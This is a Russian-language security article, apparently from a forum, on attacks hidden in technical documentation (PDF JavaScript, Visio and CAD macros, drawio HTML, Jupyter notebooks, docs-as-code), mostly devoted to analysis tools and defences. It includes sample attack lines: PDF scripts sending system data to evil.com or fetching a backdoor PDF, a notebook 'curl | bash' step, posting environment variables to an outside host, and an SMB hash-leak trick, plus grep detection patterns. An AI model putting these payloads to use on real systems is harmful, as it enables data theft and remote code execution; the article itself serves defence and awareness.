Статья Атаки через документацию: уязвимости и защита

xzotique · 09.02.2026

Очередная «революционная» платформа XDR, которая «наконец-то» предотвратит все атаки. Очередное исследование от модной аналитической фирмы, где на 50 страницах разжевана одна мысль: «APT-группы становятся всё изощрённее». Очередной твит про уязвимость нулевого дня в каком-нибудь корпоративном софте, за которой гоняется весь общедоступный секьюрити-трек, как кот за лазерной указкой.

И знаешь, что я почувствовал? Не злость, не раздражение. Глубокую, всепоглощающую усталость. Усталость от этого цирка, от этой беготни по поверхности, пока под ногами тихо и методично роют тоннели. Потому что пока все орут про сокровища в замке (ядро ОС, гипервизоры, фреймворки), настоящие грабители уже полгода как в подвале. И ключ к этому подвалу лежит не в каком-то навороченном эксплойте, а в самом скучном, самом неприметном месте, мимо которого все равнодушно проходят, спотыкаясь, но не заглядывая.

Я говорю о документации. Да, о тех самых файлах, которые все качают, но никто не читает. Которые весят гигабайтами на корпоративных шаре и в Confluence, покрываясь цифровой пылью. PDF-ки, Visio-схемы, чертежи, даташиты, мануалы по API. Их создают стажеры, перегруженные инженеры или даже автоматические системы. Их заливают на порталы менеджеры, не глядя. Их скачивают мы с тобой, когда надо срочно разобраться, почему эта чёртова система не поднимается в кластере.

И вот в этот самый момент, в этом святом акте поиска знания, нас и накрывают. Потому что мы, параноики, сканируем трафик, инспектируем бинарники, песочним подозрительные экзешники, но никогда - слышишь, никогда - не смотрим на PDF-файл с официального сайта вендора как на потенциального противника. Для нас это текст. Картинки. Нейтральная информация.

А зря. Это - самая грязная, самая изощрённая, сама эффективная дыра в нашей обороне. Это атака не на уязвимость в коде, а на самую суть нашей работы: на процесс обучения, на передачу знаний, на доверие к источнику информации. Это подмена карты местности прямо у тебя в руках, когда ты идешь по минному полю.

Почему я так вскипел? Потому что несколько лет назад мы с небольшой командой таких же уставших от блеска параноиков делали аудит безопасности не просто офиса, а целого завода - огромного, сложного, с десятками SCADA-систем, ПЛК, сборочных роботов. Всё было причёсано: сеть сегментирована, обновления стоят, пароли сложные. Но в логах DNS-сервера мы разглядели странную аномалию: с одного из инженерных компьютеров в цеху шли периодические запросы к каким-то левым доменам, вроде tech-spec-update[.]online. Нечасто, раз в пару дней. И всегда - после рабочего дня.

Мы начали копать. Оказалось, на этом компьютере инженер-технолог хранил библиотеку документации к оборудованию. Папка G:\Docs\SIEMENS\. Среди сотен PDF-файлов нашлся один, с виду абсолютно нормальный: «Руководство по настройке SINUMERIK 840D, версия 2.1». Файл был скачан с сайта одного немецкого интегратора, ссылку на которого давал сам производитель.

Открыли этот PDF не в Adobe Reader, а в гексагональном редакторе и сразу увидели странные артефакты во внутренней структуре. Потом запустили peepdf. И он нам показал красоту: внутри этого «текстового документа» жил JavaScript. Небольшой, аккуратный. Его логика была проста: при открытии файла (событие docOpen) он считывал имя компьютера, имя пользователя и, внимание, последнюю выполненную команду из истории терминала Windows (через WMI-запрос), формировал из этого строку, кодировал в base64 и… пытался «загрузить картинку». Делал он это через вызов app.launchURL(), формируя GET-запрос на внешний сервер вида http://cdn.integrator-support[.]com/img/logo.png?d=<утечка>.

Это был не взлом. Это была утечка. Медленная, тихая, легальная. Файл был открыт раз в пару дней, когда инженер что-то уточнял. И каждый раз он «звонил домой», отвозя кусочки информации. А самое прекрасное (в своем изуверском роде) - если бы мы пошли по этому URL, мы бы действительно получили картинку логотипа. Вредоносная нагрузка была не в картинке, а в факте запроса с данными в параметрах. Сервер интегратора был скомпрометирован, и на его поддомене cdn стоял простой скрипт, логирующий всё, что приходит.

Этот случай был для меня как удар током. Мы искали сложные атаки на контроллеры, а дыра была в обычном PDF, который лежал в папке два года. С тех пор я смотрю на любую документацию не как на источник знаний, а как на потенциального курьера с двойным дном. И чем официальнее источник, тем больше подозрений.

Поэтому сегодня я закрываю все эти вкладки с хайповыми новостями. Отодвигаю чашку. Поехали говорить о настоящей войне. О войне, которая идет не в лентах новостей, а в тысячах ежедневно открываемых файлах с расширениями .pdf, .vsdx, .drawio, .dwg. О том, как устроены эти мины замедленного действия, как их искать своими руками и как, наконец, перестать быть мишенью.

Часть 1: Философия дыры. Почему документация - это идеальная мишень?

Все просто. Давай посмотрим на жизненный цикл атаки глазами атакующего (красная команда, хакер, APT - называй как хочешь).

Цель: Проникнуть в сеть/систему защищенной организации. Цель умная, у нее есть фаерволы, IDS/IPS, песочницы, DLP, обученные сотрудники. Прямой штурм дорог и шумен.
Вектор: Социальная инженерия. Классика. Но фишинг с письмом «Вы выиграли iPhone» ловят. А письмо от «техподдержки вендора» с темой «Важное обновление документации к вашему оборудованию Cisco/HP/Siemens»? С вложенным PDF, который выглядит на 100% как настоящий? Его откроют. И не просто откроют, а сохранят в рабочую папку, будут использовать как эталон. Это не одноразовый клик, это долгосрочное внедрение.
Уязвимость: Доверие. Доверие к источнику (сайт вендора, репозиторий технической документации, портал интегратора). Доверие к формату («Это же просто PDF/схема/чертеж, что он может сделать?»). Доверие к содержимому («Я же просто смотрю пример кода, я не запускаю его»). Это уязвимость человеческого фактора, помноженная на техническую слепоту к «неисполняемым» форматам.
Эксплуатация: А вот здесь начинается магия. Современные форматы документов - это не картинки. Это полноценные, сложные, часто программируемые среды.
- PDF - это, по сути, небольшой интерпретируемый язык (PostScript, JavaScript для PDF). В него можно встроить: JavaScript (который выполняется при открытии, закрытии, наведении курсора), Flash (устарело, но есть наследники), 3D-модели, вложения других файлов, формы с полями ввода, которые могут куда-то отправлять данные. Открыл файл - и твой Adobe Reader или браузер тихо отрапортовал о твоей системе, скачал и запустил шелл-код, используя уязвимость в рендерере, или просто вытащил чувствительные данные из других открытых документов.
- Схемы и чертежи (Visio,
  Ссылка скрыта от гостей
  , AutoCAD DWG/DXF, etc.) - еще страшнее. Это векторные форматы, которые поддерживают макросы (VBA в Visio, LISP в AutoCAD), ссылки на внешние ресурсы («подгрузи библиотеку символов с такого-то URL»), OLE-объекты. Архитектор открывает красивую схему облачной инфраструктуры, а она тянет из интернета «обновленную библиотеку иконок AWS», в которой сидит шелл. Или макрос в Visio при сохранении файла добавляет в него учетные данные из кэша системы.
Пост-эксплуатация: Документ лежит в корпоративной сети. Он в общих папках, он прикреплен к задачам в Jira, он в базе знаний Confluence. Он легитимен. Он - троянский конь, стоящий прямо в воротах. Его могут месяцами открывать разные сотрудники, запуская вредоносную нагрузку снова и снова. Он может быть синхронизирован в облачные хранилища. Он - идеальный персистент.

Вывод из части 1: Атака через документацию - это атака высокого порядка. Она обходит технические средства защиты, эксплуатирует базовые рабочие процессы и оставляет после себя артефакты, которые практически невозможно отличить от легитимных. Это не хак - это джиу-джитсу. Используем силу противника (его доверие к документации) против него самого.

Часть 2: Глубокое погружение. Инструментарий и техники.

Предупреждаю: информация для осознания угрозы и защиты. Не для глупостей. Если ты пойдешь этим путем, тебя быстро найдут, потому что ты не профи. Профи сидят тихо и годами. А мы с тобой - параноики, которые любят понимать, как все устроено.

Слой 1: PDF - волк в овечьей шкуре.

Внутри обычного PDF может быть целый зоопарк. Смотрим через призму аналитика.

1.1. Встроенный JavaScript.
Это король. JS в PDF может делать очень многое, особенно если читалка уязвима или слишком «умна». Примеры действий:

Сбор информации: Через app объект можно получить кучу данных: версия ридера, ОС, путь к файлу, язык.

JavaScript:

// Пример кода в PDF JS
var info = "";
info += "Версия: " + app.viewerVersion + "\n";
info += "Платформа: " + app.platform + "\n";
info += "Язык: " + app.language + "\n";
// И дальше отправить это куда-нибудь
this.submitForm({
cURL: "https://evil.com/collect",
cSubmitAs: "HTML"
});

Открытие внешних ресурсов: Загрузка других PDF, EXE, скриптов под видом «дополнительных материалов».

JavaScript:

this.getURL("https://evil.com/backdoor.pdf"); // Догрузит и откроет еще один PDF
app.launchURL("file:///C:/windows/system32/calc.exe", true); // Да, так тоже можно попробовать

Эксплуатация уязвимого плагина/ридера: Старый, но иногда работающий метод - JS, который нацелен на конкретную CVE в Adobe Reader или Foxit. Может инициировать heap-spray и выполнение кода.
Кража данных из формы: Если в PDF есть формы (поля ввода), JS может отправить их содержимое на удаленный сервер при нажатии любой кнопки, даже «Сохранить».
Interaction с другими документами: В теории, JS одного PDF может попытаться получить доступ к содержимому других открытых PDF-документов (если они в том же окне ридера). Золотая жила для промышленного шпионажа.

Практический инструмент для анализа: peepdf.
Это наша палочка-выручалочка. Консольная утилита на Python, которая разбирает PDF как луковицу.

Bash:

python peepdf.py -i suspicious_file.pdf

Она покажет: версию PDF, все объекты, потоки (streams), наличие JavaScript, энкодинги, подозрительные элементы (открытие действий, запуск URL, вложенные файлы). Умеет делать статический и динамический анализ (примитивный эмулятор JS внутри PDF). Обязательный первый шаг для любого подозрительного PDF.

Практический инструмент для защиты: QPDF и mutool.
Это наши санитары. Идея: пересобрать PDF, выкинув из него все потенциально опасные элементы.

Bash:

# QPDF: декодирует потоки, делает PDF линейным (предсказуемым)
qpdf --linearize --stream-data=compress infected.pdf cleaned_qpdf.pdf

# MuPDF (mutool): МОЩНЫЙ инструмент. Может просто вытащить текст и картинки.
mutool clean -d -g -z -i infected.pdf cleaned_mutool.pdf
# Ключи: -d (декомпрессия), -g (собрать заново), -z (сжать), -i (очистить JS и действия)

После такой чистки PDF становится «плоским». Он, возможно, потеряет интерактивность, формы, но станет безопасным для просмотра. Отлично для корпоративных политик: весь входящий PDF должен проходить через mutool clean.

1.2. Вложенные файлы (Embedded Files).
PDF - это контейнер. В него можно встроить хоть virus.exe. Ридеры часто спрашивают: «Открыть вложение?». Любопытный пользователь нажмет «Да». Особенно если файл назван AdditionalDrivers.exe или ConfigurationTool.msi.

Анализ: peepdf покажет вложения. Также можно использовать binwalk или просто pdfinfo и pdftk.

Bash:

pdfinfo suspicious_file.pdf | grep -i embedded
pdftk suspicious_file.pdf unpack_files output .

1.3. XFA-формы (XML Forms Architecture).
Это целая богатая платформа внутри PDF, почти отдельная апплет-среда. Крайне мощная и... крайне уязвимая исторически. XFA-формы могут содержать сложную логику, подгружать данные с серверов. Идеальный вектор.

Анализ: peepdf также замечает XFA. Можно вытащить XML и изучить вручную.

1.4. Ссылки на внешние объекты (URI Actions).
Самая простая и частая вещь. В PDF есть кнопка или ссылка «Обновить прошивку», «Скачать последнюю версию», «Перейти к онлайн-документации». И ведет она на

Ссылка скрыта от гостей

. Пользователь привык кликать.

Слой 2: Схемы, чертежи, диаграммы - макросы и не только.

Здесь царят другие форматы, но суть та же.

2.1. Microsoft Visio (.vsdx, .vsd).
Visio - это вам не шутки. Поддерживает VBA-макросы точно так же, как Word и Excel. Макрос может запуститься при открытии, закрытии, редактировании фигуры.

Техника: Злоумышленник берет легитимную схему сетевой инфраструктуры (например, с сайта Cisco), добавляет в нее невидимый макрос. Макрос делает что-то простое: например, при сохранении документа добавляет в него текстовую фигуру с крошечным шрифтом, куда записывает результат выполнения whoami /all или дергает PowerShell-скрипт. Документ пересылается дальше.
Опасность: Блокировка макросов из интернета в Office часто не применяется к Visio с той же строгостью. И люди открывают.

Инструмент для анализа: oledump.py и viMon (Visio Monitor).
oledump.py (от Дидье Стивенса) - классика для анализа OLE-файлов (куда входят старые .vsd). Покажет все потоки, в том числе макросы.
viMon - более специализированный инструмент для анализа метаданных и структуры Visio.

2.2.
Ссылка скрыта от гостей
/
Ссылка скрыта от гостей
(.xml, .html).
Казалось бы, безобидный онлайн-редактор. Но он сохраняет диаграммы в XML или в единый HTML-файл, который содержит всю графику, описанную в JavaScript. Этот HTML-файл можно отдать жертве. Внутри него - JS. И если жертва откроет его в браузере (а она откроет, ведь это «просто схема»), JS выполнится в контексте локального файла (file://). Он может попытаться получить доступ к локальным ресурсам, отправить что-то в сеть.

Анализ: Это просто текст. Открываешь HTML-файл в редакторе, ищешь теги <script>. Все на виду.

2.3. CAD-системы (AutoCAD, SolidWorks).
Святая святых промышленного шпионажа. Чертежи (.dwg, .dxf, .sldprt) могут содержать:

AutoLISP скрипты: Язык автоматизации AutoCAD. Скрипт может, например, при открытии чертежа прочитать другие файлы в папке проекта и отправить их на удаленный сервер.
Ссылки на внешние файлы (XREFs): Чертеж может ссылаться на внешний файл (например, стандартную библиотеку деталей), который лежит на сетевом ресурсе. Подменив этот файл на сервере, можно заразить все чертежи, которые его используют.
Встроенные объекты OLE: Как и в Office.

Инструменты: Специализированные просмотрщики DWG (например, Autodesk TrueView) или открытые библиотеки для парсинга libredwg.

Часть 3: Реальная жизнь. Сценарии атак (Case Studies).

Давай разберем три гипотетических, но абсолютно реалистичных сценария.

Сценарий 1: Целевая атака на производителя оборудования.

Рекон: Красная команда изучает сайт вендора сетевого оборудования. Находит раздел «Техническая документация» с кучей PDF по настройке межсетевых экранов.
Подготовка: Берется один популярный PDF (например, «Настройка IPSec VPN»). С помощью фреймворка вроде PDFtk или Burp (да, Burp умеет работать с бинарями) в тело PDF встраивается JavaScript-ловушка. Код делает следующее: при открытии PDF (событие documentOpen) пытается через app.launchURL открыть SMB-шару \\evil-server\pwn$\check.html. Почему SMB? Потому что если читалка под Windows попытается обратиться к сетевому ресурсу, система выполнит аутентификацию по NTLM и отправит хэш пользователя на наш сервер. Это классическая NTLM-relay атака, инициированная из документа.
Доставка: Через SQL-инъекцию или компрометацию аккаунта на сайте вендора злоумышленник заменяет оригинальный PDF на свой. Или создает фишинговый микро-сайт-клон раздела документации и продвигает его в SEO так, чтобы он был выше оригинала. Инженер ищет мануал, качивает.
Эксплуатация: Инженер открывает PDF. Его система молча отправляет хэш пароля. Мы его перехватываем, релаим (relay) на другую машину в сети или брутфорсим. Получаем доступ. Все благодаря «безобидному» PDF.

Сценарий 2: Атака на цепочку сборки ПО (Build System).

Цель: Внедриться в процесс разработки крупного опенсорсного проекта.
Вектор: Файл ARCHITECTURE.md или DEPLOYMENT.drawio. Многие проекты держат схемы архитектуры прямо в репозитории.
Подготовка: В
Ссылка скрыта от гостей
-схеме (HTML) добавляется JS, который при открытии в браузере (а разработчики любят открывать такие файлы локально) делает XMLHttpRequest на file:///home/developer/.ssh/id_rsa (или C:\Users\dev\.ssh\id_rsa). Из-за политик CORS в локальных файлах это может не сработать, но можно использовать <iframe> или другие трюки. Более надежный вариант - макрос в Visio-схеме, которую архитектор может хранить в репе.
Эксплуатация: Разработчик, обновляя репу, тянет к себе новую версию схемы. Открывает ее, чтобы что-то уточнить. Его SSH-ключ уходит на удаленный сервер. Через пару дней в главной ветке (main) появляется коммит с едва заметным изменением в коде зависимостей, добавляющим бэкдор. Расследование покажет, что коммит сделан с ключа этого разработчика. Его скомпрометировали через документацию в репозитории.

Сценарий 3: Массовая кампания через порталы документооборота.
Представь портал типа manualslib.com или корпоративный SharePoint с библиотекой документов. Атакующий, имея начальный доступ (или через XSS/инъекцию), загружает сотни зараженных PDF-файлов с популярными названиями (Windows_Server_2022_Security_Guide.pdf, Cisco_IOS_Command_Reference.pdf). Они индексируются поиском. Сотни сотрудников разных компаний качают их. Встроенный JS в PDF делает запрос на уникальный поддомен для каждого файла (pdf12345.evil-tracker.com), позволяя атакующему понять, кто, когда и откуда скачал файл. Это ценная разведка для будущих целевых атак. Или, если найдена подходящая уязвимость в читалке, - массовое заражение.

Часть 4: Защита. Как не стать жертвой?

Здесь нет серебряной пули. Есть паранойя и процесс. Делай так:

Для личного использования:

Просмотрщик-изгой: Выдели одну программу исключительно для открытия подозрительных PDF. Лучше всего - MuPDF (модифицированный mupdf-gl). Он минималистичный, не поддерживает JS, XFA, формы. Или браузер Chrome/Firefox (они имеют встроенные, очень ограниченные по функционалу PDF-просмотрщики, обычно без JS). Никогда не используй Adobe Reader или Foxit для файлов из непроверенных источников.
Виртуализация/изоляция: Открывай все документы от вендоров в одноразовой виртуальной машине или в контейнере. Windows Sandbox (в Win10/11 Pro) - отличная штука для этого. Закрыл - все испарилось.
Преобразование: Конвертируй подозрительный PDF в картинки или простой текст. pdftoppm (из пакета Poppler) или mutool draw превратят PDF в набор PNG. Убивает любую активность.
Bash:
```
mutool draw -o page_%d.png suspicious_file.pdf 1-100
```

Анализ перед открытием: Приучи себя к 5-секундной проверке.

Bash:

file downloaded_manual.pdf
strings downloaded_manual.pdf | head -50 | grep -i -E "javascript|js|launch|uri|submit|http://|https://"
pdfinfo downloaded_manual.pdf

Для корпорации (рекомендации для параноидального CISO):

Политика на уровне шлюза: Все входящие PDF-файлы (через почту, веб-загрузки) должны проходить через конвертер-очиститель. Разверни сервис на базе mutool clean или коммерческого решения (типа VirusTotal API или CrowdStrike Falcon с функционалом инспекции файлов). На выходе - только «плоские» PDF.
Блокировка активного контента: Групповые политики (GPO) для отключения JavaScript, XFA, выполнения действий (Launch) во всех корпоративных просмотрщиках PDF (Adobe, Foxit). Навсегда.
Сегментация и мониторинг: Рабочие станции инженеров, архитекторов, конструкторов (те, кто работает с Visio, CAD) должны быть в отдельном сегменте сети с усиленным мониторингом исходящего трафика. DNS-запросы от стационарных ПК к случайным доменам - тревога. Исходящие SMB-сессии - красный флаг.
Осознанность: Включи в программу Security Awareness не только «не открывай эксельки от незнакомцев», но и отдельный модуль: «Техническая документация как угроза. Правила обращения». Объясни про встроенные скрипты, макросы в схемах, ссылки на внешние ресурсы.
Анализ своих артефактов: Прогони все PDF и схемы из своих внутренних баз знаний, порталов документооборота через peepdf и аналоги. Найдешь сюрпризы, возможно, еще с 2010 года лежащие там.
Парсинг лог-файлов: Научи свои SIEM/SOC искать не только powershell.exe -enc, но и строки в логах, связанные с открытием PDF/Visio-файлов, и последующие сетевые активности (особенно на нестандартные порты) с того же хоста в короткое время.

Часть 5: Будущее и выводы. Куда катится этот мир? И что делать нам, параноикам?

Привет, снова я. Ты думал, всё закончилось на инструментах и сценариях? Это была лишь прелюдия. Пятая часть - это взгляд за горизонт. Это та самая тема, о которой не говорят на конференциях, потому что там всё ещё пытаются продать тебе очередной «волшебный» UTM или EDR. А мы с тобой знаем: настоящая битва происходит на уровне смыслов, процессов и той самой доверенной «инструкции».

Итак, куда катится мир документации? В пропасть удобства и тотальной интерактивности. И в этой пропасти для нас открываются и бездонные риски, и уникальные возможности.

5.1. Тренды-убийцы: что делает атаки через документацию неизбежными

1. Живые документы (Live Docs) и Embedded IDE.
Грань между документом и приложением стирается. Посмотри на современные платформы типа:

Google Colab / Jupyter Notebooks (.ipynb): Это вообще не документ в классическом смысле. Это интерактивная среда выполнения кода (Python, R), обёрнутая в разметку. Инженер качает с GitHub ноутбук с примером использования новой ML-библиотеки. Запускает ячейки локально. А в предпоследней, неочевидной ячейке, скрыта команда: import os; os.system('curl
Ссылка скрыта от гостей
| bash'). Или более изощрённо: ноутбук использует pip install из приватного репозитория, который тянет заражённую библиотеку. Защита? Нет, не слышали. А ведь ноутбуки сейчас - стандарт в data science, а значит, и в аналитике больших данных на любом серьёзном производстве, в банках, в исследовательских центрах.

Практический инструмент для анализа ноутбуков: nbdime и nbscan.
nbdime - это diff и merge для Jupyter Notebooks, но его же можно использовать для детального просмотра структуры.

Bash:

# Конвертируем .ipynb в JSON и исследуем
jq '.cells[] | select(.cell_type == "code") | .source[]' suspicious_notebook.ipynb | grep -i -E "(os\.system|subprocess|curl|wget|pip install|\.tar\.gz|http://|https://)"

nbscan - простой скрипт для поиска опасных паттернов в ноутбуках. Напиши свой, это просто:

Python:

import json, sys
with open(sys.argv[1]) as f:
    nb = json.load(f)
for cell in nb['cells']:
    if cell['cell_type'] == 'code':
        for line in cell['source']:
            if 'os.system' in line or 'subprocess.call' in line:
                print("Подозрительный код найден:", line[:100])

Защита: Запретить выполнение ноутбуков из непроверенных источников в продакшн-средах. Использовать изолированные контейнеры (Docker) для их запуска. Внедрить политику: перед запуском любого ноутбука его должен проверить автоматический скрипт-сканер (как выше) и второй инженер (four-eyes principle).

2. Документация как код (Docs-as-Code) и её ядовитые плоды.
Сейчас модно хранить документацию в Markdown (.md) прямо в репозитории с кодом, а сборку публичного сайта документации доверять CI/CD (например, через GitHub Pages, ReadTheDocs, MkDocs). Злоумышленник, внедрившийся в репозиторий (через скомпрометированный аккаунт или как в сценарии 2), может:

Добавить вредоносный JavaScript в Markdown-файл (да, в MD можно вставить raw HTML и <script&gt.
Подменить конфигурацию сборщика документации (например, mkdocs.yml), чтобы тот при сборке подгружал CSS/JS с вредоносного CDN.
Встроить в документацию «примеры конфигурации» для систем типа Terraform, Ansible, Kubernetes, которые содержат утечки credentials, неправильные security policies (например, подключающие S3-бакет публично) или даже прямые вызовы сторонних ресурсов.

Таким образом, компрометация репозитория документации приводит к автоматическому заражению официального сайта справки, которым пользуются тысячи разработчиков.

Практический инструмент: Статический анализ пайплайнов CI/CD.
Нужно смотреть не только на код приложения, но и на workflow-файлы (.github/workflows/, .gitlab-ci.yml), и на конфиги сборки документации.

Bash:

# Ищем подозрительные ссылки в репозитории с докой
grep -r -E "(http://|https://)raw\.githubusercontent" docs/ --include="*.md" --include="*.yml" --include="*.yaml"
# Ищем вызовы curl/wget в CI-файлах
find . -name "*.yml" -o -name "*.yaml" | xargs grep -l -E "(curl|wget) " | xargs grep -B2 -A2 "curl"

3. Умные схемы и цифровые двойники (Digital Twins).
Схема архитектуры в

Ссылка скрыта от гостей

- это вчерашний день. Завтра - это «цифровой двойник» цеха или ИТ-инфраструктуры: интерактивная 3D-модель, связанная с реальными датчиками и API. Файлы таких двойников - сложные JSON/XML структуры, которые могут содержать:

Креденшиалы для подключения к реальным API (зашитые «для удобства»).
Ссылки на WebSocket- или MQTT-эндпоинты, которые при открытии двойника в редакторе автоматически подписываются на потоки данных и могут служить каналом для атаки на систему, с которой соединяется редактор.
Макросы и скрипты, выполняемые в среде просмотра двойника (например, в специальном CAD-приложении).

Атака смещается с «заразить документ» к «скомпрометировать цифровую модель, чтобы атаковать физический объектор, который она отражает».

4. Всепроникающий ИИ: Генерация ядовитой документации.
ChatGPT и ему подобные - это не только помощник кодеру. Это идеальный генератор контекстно-зависимой, правдоподобной документации. Злоумышленник может:

Создать фишинговый сайт-клон документации, где весь контент (вплоть до сложных примеров кода) сгенерирован ИИ и выглядит абсолютно легитимно. Никакого копипаста, уникальный текст, что обходит примитивные сигнатуры.
Внедрить в легитимную документацию вредоносные примеры, которые ИИ «не заметит» как опасные. Например: «Для ускорения отладки добавьте в ваш скрипт следующую строку: import requests; requests.post('
Ссылка скрыта от гостей
', json=os.environ)». Выглядит как внутренний мониторинг, а на деле - слив переменных окружения.
Генерировать персонализированные письма с документацией для целевых сотрудников, где в тексте упоминаются реальные внутренние проекты и имена, полученные через OSINT.

Практический инструмент: Детектирование AI-генерации - сомнительная защита.
Полагаться на детекторы AI-текста бесполезно, они слишком ненадёжны. Ключ - цифровая подпись и атрибуция. Нужна инфраструктура, где каждый официальный документ сопровождается криптографической подписью издателя (например, GPG-подпись для файлов в репозитории, или проверяемые JWT-токены для доступа к порталам документации). Если нет подписи - файл считается недоверенным, как бы легитимно он ни выглядел.

5.2. Эволюция инструментов атаки и защиты

Для атакующих:

Фреймворки для автоматизации создания PoC. Инструменты вроде bettercap, Metasploit уже имеют модули для генерации вредоносных PDF. Будут появляться специализированные фреймворки, которые по описанию уязвимости (CVE в парсере SVG, в движке JS) будут генерировать идеальный документ-эксплойт, замаскированный под технический мануал.
OSINT-пайплайны для целевой документации. Скрипты, которые автоматически скачивают всю документацию с сайта компании-жертвы, анализируют стиль, шаблоны, используемые шрифты, структуру, а затем генерируют «апдейт» или «дополнение» к существующему документу, которое выглядит как родное.

Для защитников (НАШИ инструменты):

Формальные верификаторы документов. Представь себе аналог статического анализатора кода (SAST), но для PDF, Visio, ноутбуков. Он строит дерево объектов документа, выявляет все действия (Actions), ссылки (URI), встроенные скрипты и оценивает их риск. Такой инструмент в зачаточном виде есть - peepdf, но ему нужны наследники с GUI, интеграцией в CI и богатыми правилами.
Динамические песочницы для документов нового типа. Не просто виртуальная машина, а специализированная среда, которая эмулирует или нативно открывает документ, отслеживая не только вызовы процессов, но и:
- Сетевые соединения на уровне сокетов (куда и что пытается отправить JS в PDF).
- Попытки доступа к файловой системе через API редактора (например, попытка скрипта в CAD-файле прочитать C:\Users\*.ssh\id_rsa).
- Изменения в реестре или системных настройках.
  Инструменты вроде Cuckoo Sandbox или Joe Sandbox уже частично это умеют, но требуют тонкой настройки под специфичные форматы.
Системы контроля целостности документации (Doc Integrity Monitoring). Аналог файлового мониторинга (FIM), но для репозиториев документации. Фиксирует хэш-суммы всех официальных PDF, схем, руководств. Если на портале или в SharePoint файл изменился без сопровождения соответствующего тикета в системе изменений - тревога. Если файл скачан пользователем и его хэш не совпадает с эталонным - предупреждение в реальном времени.

5.3. Стратегия защиты: Паранойя как система

Личная и корпоративная защита должна эволюционировать от точечных мер к целостной философии. Я называю ее «Доверяй, но изолируй и наблюдай» (Trust, but Isolate and Observe).

Уровень 1: Изоляция по умолчанию.

Специализированные рабочие места: Для просмотра технической документации должны быть выделены отдельные, сильно ограниченные виртуальные машины или контейнеры. Никакого доступа к основной сети, только выхлоп в интернет через прозрачный прокси-логгер. Закрыл документ - откатил снапшот.
Аппаратная сегментация: Инженеры, работающие с чертежами (CAD) или схемами (Visio), должны сидеть на компьютерах, физически или логически (VLAN) отделённых от сети разработки и продакшена. Их трафик должен проходить через NGFW с глубоким анализом протоколов, включая разбор SMB, NFS (которые могут инициироваться из документов!).

Уровень 2: Наблюдение за мета-взаимодействием.
Нужно мониторить не только факт открытия документа, а последовательности событий.

Правило для SIEM: (EventID=4663 - доступ к файлу с расширением .pdf/.vsdx) → (в течение 60 секунд) → (EventID=5156 - исходящее сетевое подключение с этого же хоста на небелый порт/домен) = КРИТИЧЕСКАЯ ТРЕВОГА.
Анализ DNS-запросов от статичных рабочих станций: Если инженерский ПК, который неделями запрашивал только internal.corp.com и docs.microsoft.com, внезапно спрашивает strange-fonts[.]online или api.telegram[.]org - это повод для жёсткого расследования.

Уровень 3: Культурный сдвиг - «Документационная гигиена».
Это сложнее всего. Нужно привить новую культуру:

«Никаких макросов в документах. Вообще. Никогда.» Это должно быть железным правилом, как «не пересылать пароли в почте». Если нужна интерактивность - это веб-приложение, а не документ.
Проверка источников по цифровому отпечатку: Привычка не просто качать PDF, а проверять: скачан ли он с HTTPS-сайта, есть ли у сайта валидный сертификат, совпадает ли дата последнего изменения файла с датой публикации на сайте.
Использование «читальных залов»: Создание внутренних, безопасных порталов, где документы от вендоров предварительно обрабатываются (очищаются, конвертируются в безопасный формат) и только затем становятся доступны сотрудникам. Что-то вроде внутреннего «документационного прокси».

5.4. Заключение: Наш манифест параноика

Брат, мы стоим на пороге эры, где сама информация, призванная нести знание, становится её главным разрушителем. Цепь поставок доверия ржавеет изнутри. Инфосек будет ещё долго бегать за уходящими поездами вроде уязвимостей нулевого дня, не замечая, что бомба уже лежит в папке «Документы» на каждом компьютере в сети.

Наша сила - в понимании этой тихой войны. В том, что мы не верим в «просто файлы». Мы видим в каждом PDF потенциального лазутчика, в каждой схеме - карту с ловушками, в каждом ноутбуке - неопознанный исполняемый объект.

Будущее не за тотальным запретом документации. Оно за разумной, технологичной паранойей. За средой, где документ живёт в цифровом клетчатом ящике, под присмотром автоматических сторожей, и где любая его попытка пошевелиться вне отведённых рамок немедленно пресекается.

Оставайся бдителен. Оставайся параноиком. И помни: в современном мире самый опасный вирус - это не код. Это плохая инструкция.

Поиск

Поиск

Статья Атаки через документацию: уязвимости и защита

Часть 1: Философия дыры. Почему документация - это идеальная мишень?

Часть 2: Глубокое погружение. Инструментарий и техники.

Слой 1: PDF - волк в овечьей шкуре.

Слой 2: Схемы, чертежи, диаграммы - макросы и не только.

Часть 3: Реальная жизнь. Сценарии атак (Case Studies).

Часть 4: Защита. Как не стать жертвой?

5.1. Тренды-убийцы: что делает атаки через документацию неизбежными

5.2. Эволюция инструментов атаки и защиты

5.3. Стратегия защиты: Паранойя как система

5.4. Заключение: Наш манифест параноика

Похожие темы

Популярный контент

Экосистема Codeby

HackerLab

Forum Codeby

Codeby Academy

Статья Атаки через документацию: уязвимости и защита

Часть 1: Философия дыры. Почему документация - это идеальная мишень?​

Часть 2: Глубокое погружение. Инструментарий и техники.​

Слой 1: PDF - волк в овечьей шкуре.​

Слой 2: Схемы, чертежи, диаграммы - макросы и не только.​

Часть 3: Реальная жизнь. Сценарии атак (Case Studies).​

Часть 4: Защита. Как не стать жертвой?​

5.1. Тренды-убийцы: что делает атаки через документацию неизбежными​

5.2. Эволюция инструментов атаки и защиты​

5.3. Стратегия защиты: Паранойя как система​

5.4. Заключение: Наш манифест параноика​

Похожие темы

Популярный контент

HackerLab

Forum Codeby

Codeby Academy

Часть 1: Философия дыры. Почему документация - это идеальная мишень?

Часть 2: Глубокое погружение. Инструментарий и техники.

Слой 1: PDF - волк в овечьей шкуре.

Слой 2: Схемы, чертежи, диаграммы - макросы и не только.

Часть 3: Реальная жизнь. Сценарии атак (Case Studies).

Часть 4: Защита. Как не стать жертвой?

5.1. Тренды-убийцы: что делает атаки через документацию неизбежными

5.2. Эволюция инструментов атаки и защиты

5.3. Стратегия защиты: Паранойя как система

5.4. Заключение: Наш манифест параноика